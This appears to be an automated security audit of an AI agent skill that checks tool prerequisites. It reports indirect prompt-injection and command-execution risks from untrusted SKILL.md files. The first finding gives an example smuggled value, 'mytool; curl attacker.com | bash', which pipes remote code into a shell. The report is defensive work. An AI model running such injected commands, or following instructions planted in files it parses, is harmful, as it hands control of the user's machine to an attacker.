claude-skill-prereq-audit

Pass

Audited by Gen Agent Trust Hub on Mar 11, 2026

Risk Level: SAFE
COMMAND_EXECUTION, EXTERNAL_DOWNLOADS, PROMPT_INJECTION
Full Analysis
  • [PROMPT_INJECTION]: The skill is vulnerable to indirect prompt injection. It ingests untrusted data from SKILL.md files located in ~/.claude/skills/ and .claude/skills/. There are no boundary markers or instructions to ignore embedded commands within the parsed content. A malicious skill could include crafted 'tool names' or 'prerequisites' containing shell metacharacters (e.g., mytool; curl attacker.com | bash) to gain arbitrary command execution when the auditor parses and checks the tool.
  • [COMMAND_EXECUTION]: The skill performs dynamic shell execution using tokens parsed from external files. Specifically, it runs command -v <tool>, <tool> auth status, and brew install <tool>. The capability inventory includes full subprocess execution and package installation, which, when combined with unsanitized input from the parsed skill files, presents a code execution risk.
  • [EXTERNAL_DOWNLOADS]: The skill initiates external downloads and installations via well-known package managers like Homebrew (brew install) and GitHub CLI (gh extension install). While the package managers themselves are trusted, the specific packages or extensions to be installed are determined by the contents of other skills found on the system.
Audit Metadata
Risk Level: SAFE
Analyzed: Mar 11, 2026, 11:59 AM